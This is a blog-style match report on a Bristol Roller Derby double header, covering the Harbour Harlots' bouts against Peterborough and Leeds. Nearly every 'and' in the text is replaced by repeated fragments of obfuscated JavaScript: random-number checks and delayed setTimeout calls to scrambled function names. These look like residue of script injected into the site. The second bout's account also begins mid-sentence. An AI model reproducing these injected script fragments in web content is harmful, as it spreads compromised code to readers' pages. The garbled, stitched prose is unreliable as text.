Rolling up on you: Bristol Roller Derby March Double Header

March 2, 2013 in Audio, Bristol, Events, Roller Derby, South West

We must admit, to the uninitiated first time attendant of a roller derby bout, you would be forgiven thinking it is mobilised madness. By the end of the evening however, that same attendant would be cheering on great plays andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and cheering them because they know why they are great plays.

One reason for this is the MC’s for the bouts, Dr Feral andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Red October. Their accessible breakdown of what was happening on the track soon provided clarity on what was unfolding. Another reason is the amount of officials involved in a bout. There are officials who highlight which is the leading jammer andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and which is in a non-scoring position.

Bristol Harbour Harlots B vs Peterborough Mean Valley Roller Girls

The Peterborough Mean Valley Roller Girls took part in the first bout of the day, taking on Bristol Harbour Harlots B. The bleachers at the WISE Campus were full as the teams huddled in each corner for their last minute pep talks.

The away team rolled out first lead by their captain Diva La Lunatic K9. The rest of the Roller Girls were introduced andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and looked ready to play. The Harlots took to the track for their well rehearsed introduction. Oscillating cheers filled the sports hall as the each Harlot acknowledged the fans.

The bouts would be run under a new rule set that had been introduced. The main difference being that there would now be one whistle setting off the jam, rather than a second whistle that would be the signal for the jammers to start.

With that whistle, the floor rumbled with the impact of stoppers andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and wheels driving the athletes forward. Jammers from both teams got away from the pack early, with Diva La Lunatic for Mean Valley holding lead jammer status. The roles were reversed in the next jam andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Bristol quickly put points on the board. Bristol soon found themselves two blockers down as they served time in the penalty box. Mean Valley had their pivot serving time too, which all amounted to a light pack this time round.

Mean Valley immediately got a power jam situation as the Bristol Jammer was sin binned for an infringement. Mean Valley capitalised before finally calling off the jam. With the score at Mean Valley 22 andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Bristol Harlots B 9, the Mean Valley jammers were stamping their authority on the game.

IMG_2554
HeltaSkater leading the pack

Compounding the situation for Bristol was that they found themselves bearing the brunt of the officials calls. Quickly again in the first half they were a jammer down, allowing Mean Valley to enjoy another power jam. Mean Valley raced to a 46 to 9 lead with diva La Lunatic showing personality andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and determination in negotiating the pack when jamming. The Mean Valley captain didn’t escape the eye of the refs, spending time in the sin bin early which is always costly for an effective player.

The Harlots were able to pull back to 24 points against the Roller Girls 46, using the power jams afforded them from Mean Valley’s mistakes.

When the Mean Valley captain was on the track, the Bristol blockers definitely had their handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands full. HelterSkater was also able to score as Bristol were in the penalty, giving Harlot blockers more to think about with the score standom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anding at 77 to Mean Valley Roller Girls andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and 27 to the Bristol Harbour Harlots.

SnoAngel performed well in the jammer role towards the end of the first period, despite her best efforts the Bristol jammers gave away more power jams that allowed Mean Valley to reach 110 to Bristol’s 42 with 6:50 to play in the first period. Wrecks was up jamming against Diva La Lunatic andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Bristol were able to pull together some great blocks to allow Wrecks to become the lead jammer in Jam 21.

At the end of the first period the scores stood at 55 to 124 for Mean Valley.

Til Thrillster started at jammer for Bristol to open the second period, up against the high scoring Mean Valley captain, Diva La Lunatic. It would be understandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andable for this to be a daunting moment for Til who was making her début for the Harlots. But at the whistle, the Thrillster played a patient game andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and broke through to become the lead jammer. To add to the Roller Girls woes, Diva La Lunatic was sent to the sin bin, putting Bristol in the power jam. The scoreboard kept ticking over for the Harlots as they climbed to 72 points as Mean Valley remained on 124.

High fives on the Bristol bench told the tale that the Harlots were starting to get to grips with the bout. The scores, 84 Bristol, Mean Valley 144. Wrecks’ demonstrated some great skating for the Harlots to pass the pack as the jams continued.

The early trips to the box for Diva La Lunatic came back to haunt her as her final infringement saw her ejected from the game with 22 minutes to go.

IMG_2669
Diva La Lunatic serving one of her many penalty minutes

By jam 30 Bristol had registered 117 while Mean Valley held the lead with 144 points. Da Silva Surfer, doing her part to help Bristol add to their score, stepped up to be jammer. She too would be ejected from the game for reaching her sin bin limit

With 10:36 to play in the second period Mean Valley were still scoring well with 186 points as many Bristol players were being penalised. Bristol were still fighting, bringing their score to 124.

The frustration started to show for Bristol Harbour Harlots B as the bout became more physical. The hits got harder, the blocks got bigger. As the officials took a time out Mean Valley stood at 205 andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and the Harlot B’s 143.

I love jamming…since I started playing, I wanted to be a good jammer ~ Tattooed Terror

looked fully prepared as Bristol raced out to a 32 to 0 lead over the Whip-its. The pack was maintaining a high pace, making it hard for the jammers to catch up andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and pass.

The Leeds Whip-its called a time out to talk it over as the scores stood at Bristol 35, Leeds 0. Something had to be done.

Taking the score, Leeds tallied 12 to Harlots A’s 99.

This bout didn’t see as many penalties as the first, but with the Leeds jammer going to the sin bin Black Thorn was able to rally to continue Bristol’s scoring habit. Twenty six minutes had elapsed andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and the scoreboard showed 127 to Bristol andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and 12 to the Leeds Whip-its.

That wasn’t enough to put off Bristol jammer Ruby Whipper who fought through the pack before calling the jam ahead of the Leeds jammer reaching the pack.

Bristol called a time out with the scores on 176 to 39. Calling the play

With 11:42 on the clock, Jam 11 saw the scores at 221 Harlots, 43 to the Whip-its.

Bristol still had the superior defense as they continued to make the Leeds jammers work. Leeds were only able to kill the jam to prevent the Bristol jammer catching back up to the pack in Jam 14

Leeds were not done yet, andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and started to rally late in the second period. Leeds Whip-its prepare the block

Tattooed Terror seem to love the challenge, her nimble feet making light work of the Leeds blocks to get to 236 points for the Harlots while the Whip-its were on 90.

Leeds were resigned to throwing anything at Bristol in an attempt to make a difference. Leeds captain, Twink T, matched up against Bristol’s Tattooed Terror, but to no avail. It was almost fitting that Tattooed Terror called the last jam of the bout to see Bristol run out the winners 245 points to 91 points for Leeds Roller Dolls Whip-its. With 21 Jams played Harbour Harlots A showed their class with some outstandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anding performances from Tattooed Terror, Kevin andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Black Thorn.

It’s all love at the end of the bout

Tattoo Terror is an unassuming star of Bristol Harlots. As we interviewed the Harlots Jammer we were interrupted several times by autograph hunters of the knee-high variety.

You look around andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and you occasionally have to remind yourself this is an amateur event. Fans andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and participants of roller derby are different; they know they’re different. They embrace that, so it’s easy to see why the Bristol Harlots are role models to some andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and followed by many. Be who you want to be, show personality in the bout andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and roller derby will welcome you.

The gulf between the Harlots’ A andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and B squads was clear. The difference in speed, skill level, detail of strategy was apparent. The infrastructure of Bristol Harlots illustrates what is possible through attending practice, playing hard andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and wanting to improve. B squad members must be excited at the opportunities that lay before them.

We stayed around after the crowds had left andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and witnessed a small circle of players in the middle of the arena cheering as the player awards were given out. This was perhaps a bit of a missed opportunity by the event organisers as we feel the fans would love to be a part of that moment.

If we can get a seat, we’ll be going back.
